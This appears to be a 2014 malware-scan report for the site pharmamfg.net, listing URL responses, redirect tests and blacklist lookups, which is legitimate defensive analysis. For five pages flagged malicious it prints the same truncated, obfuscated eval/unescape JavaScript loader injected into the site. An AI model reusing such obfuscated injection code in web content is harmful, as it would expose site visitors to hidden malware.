Scanned pages/files
Request | Server response | Status |
http://pharmamfg.net/ | HTTP/1.1 302 Found Connection: close Date: Sat, 23 Aug 2014 08:37:57 GMT Location: http://www.indiamart.com/qurax-pharma/ Server: lighttpd/1.4.28 Content-Type: text/html X-Powered-By: PHP/5.1.6 | clean |
http://www.indiamart.com/qurax-pharma/ | 200 OK Content-Length: 38868 Content-Type: text/html | clean |
http://utils.imimg.com/imcookies/js/im-imvc-rw-cf-v1.js | 200 OK Content-Length: 12570 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://utils.imimg.com/suggest/js/jq-ac-ui.js | 200 OK Content-Length: 42636 Content-Type: application/javascript | clean |
http://fcp.imimg.com/gifs/main_VFCP-v86.js | 200 OK Content-Length: 63595 Content-Type: application/x-javascript | clean |
http://fcp.imimg.com/gifs/ef_overlay49.js?v=1 | 200 OK Content-Length: 125435 Content-Type: application/x-javascript | clean |
http://pharmamfg.net/cosmetics.html | 404 Not Found Content-Length: 5977 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window['eqvqaPl%'.replace(/[Z%qPb]/g, '')](window['eqvqaPl%'.replace(/[Z%qPb]/g, '')]('u3nge9s3cgagpoeo'.replace(/[3o9\:g]/g, ''))('%66%75%6e%63%74%69%6f%6e%20%41%49%48%28%50%49%49%41%29%7b%66%75%6e%63%74%69%6f%6e%20%48%41%70%41%41%6c%28%48%41%49%29%7b%65%76%61%6c%28%22%76%61%72%20%41%68%68%61%3d%30%3b%22%29%3b%76%61%72%20%41%4c%41%70%41%4c%3d%48%41%49%2e%6c%65%6e%67%74%68%3b%65%76%61%6c%28%22%76%61%72%20%50%4c%50%54%54%48%68%44%3d%30%3b%22%29%3b%77%68%69%6c%65%28%50%4c%50%54%54%48%68%44%3c%41%4 Antivirus reports:
| ||
http://pharmamfg.net/test404page.js | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
http://pharmamfg.net/ayurvedic.html | 404 Not Found Content-Length: 5977 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window['eqvqaPl%'.replace(/[Z%qPb]/g, '')](window['eqvqaPl%'.replace(/[Z%qPb]/g, '')]('u3nge9s3cgagpoeo'.replace(/[3o9\:g]/g, ''))('%66%75%6e%63%74%69%6f%6e%20%41%49%48%28%50%49%49%41%29%7b%66%75%6e%63%74%69%6f%6e%20%48%41%70%41%41%6c%28%48%41%49%29%7b%65%76%61%6c%28%22%76%61%72%20%41%68%68%61%3d%30%3b%22%29%3b%76%61%72%20%41%4c%41%70%41%4c%3d%48%41%49%2e%6c%65%6e%67%74%68%3b%65%76%61%6c%28%22%76%61%72%20%50%4c%50%54%54%48%68%44%3d%30%3b%22%29%3b%77%68%69%6c%65%28%50%4c%50%54%54%48%68%44%3c%41%4 Antivirus reports:
| ||
http://pharmamfg.net/allopathic-drugs.html | 404 Not Found Content-Length: 5977 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window['eqvqaPl%'.replace(/[Z%qPb]/g, '')](window['eqvqaPl%'.replace(/[Z%qPb]/g, '')]('u3nge9s3cgagpoeo'.replace(/[3o9\:g]/g, ''))('%66%75%6e%63%74%69%6f%6e%20%41%49%48%28%50%49%49%41%29%7b%66%75%6e%63%74%69%6f%6e%20%48%41%70%41%41%6c%28%48%41%49%29%7b%65%76%61%6c%28%22%76%61%72%20%41%68%68%61%3d%30%3b%22%29%3b%76%61%72%20%41%4c%41%70%41%4c%3d%48%41%49%2e%6c%65%6e%67%74%68%3b%65%76%61%6c%28%22%76%61%72%20%50%4c%50%54%54%48%68%44%3d%30%3b%22%29%3b%77%68%69%6c%65%28%50%4c%50%54%54%48%68%44%3c%41%4 Antivirus reports:
| ||
http://pharmamfg.net/qurax-tablets.html | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
http://pharmamfg.net/qurax-healthpro.html | 404 Not Found Content-Length: 5977 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window['eqvqaPl%'.replace(/[Z%qPb]/g, '')](window['eqvqaPl%'.replace(/[Z%qPb]/g, '')]('u3nge9s3cgagpoeo'.replace(/[3o9\:g]/g, ''))('%66%75%6e%63%74%69%6f%6e%20%41%49%48%28%50%49%49%41%29%7b%66%75%6e%63%74%69%6f%6e%20%48%41%70%41%41%6c%28%48%41%49%29%7b%65%76%61%6c%28%22%76%61%72%20%41%68%68%61%3d%30%3b%22%29%3b%76%61%72%20%41%4c%41%70%41%4c%3d%48%41%49%2e%6c%65%6e%67%74%68%3b%65%76%61%6c%28%22%76%61%72%20%50%4c%50%54%54%48%68%44%3d%30%3b%22%29%3b%77%68%69%6c%65%28%50%4c%50%54%54%48%68%44%3c%41%4 Antivirus reports:
| ||
http://pharmamfg.net/suppliments.html | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
http://pharmamfg.net/pharmaceutical-products.html | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
http://pharmamfg.net/profile.html | 404 Not Found Content-Length: 5977 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window['eqvqaPl%'.replace(/[Z%qPb]/g, '')](window['eqvqaPl%'.replace(/[Z%qPb]/g, '')]('u3nge9s3cgagpoeo'.replace(/[3o9\:g]/g, ''))('%66%75%6e%63%74%69%6f%6e%20%41%49%48%28%50%49%49%41%29%7b%66%75%6e%63%74%69%6f%6e%20%48%41%70%41%41%6c%28%48%41%49%29%7b%65%76%61%6c%28%22%76%61%72%20%41%68%68%61%3d%30%3b%22%29%3b%76%61%72%20%41%4c%41%70%41%4c%3d%48%41%49%2e%6c%65%6e%67%74%68%3b%65%76%61%6c%28%22%76%61%72%20%50%4c%50%54%54%48%68%44%3d%30%3b%22%29%3b%77%68%69%6c%65%28%50%4c%50%54%54%48%68%44%3c%41%4 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pharmamfg.net
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sat, 23 Aug 2014 08:37:57 GMT
Location: http://www.indiamart.com/qurax-pharma/
Server: lighttpd/1.4.28
Content-Type: text/html
X-Powered-By: PHP/5.1.6
GET / HTTP/1.1
Host: pharmamfg.net
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sat, 23 Aug 2014 08:37:57 GMT
Location: http://www.indiamart.com/qurax-pharma/
Server: lighttpd/1.4.28
Content-Type: text/html
X-Powered-By: PHP/5.1.6
Second query (visit from search engine):
GET / HTTP/1.1
Host: pharmamfg.net
Referer: http://www.google.com/search?q=pharmamfg.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pharmamfg.net
Referer: http://www.google.com/search?q=pharmamfg.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pharmamfg.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pharmamfg.net/
Result: pharmamfg.net is not infected or malware details are not published yet.
Result: pharmamfg.net is not infected or malware details are not published yet.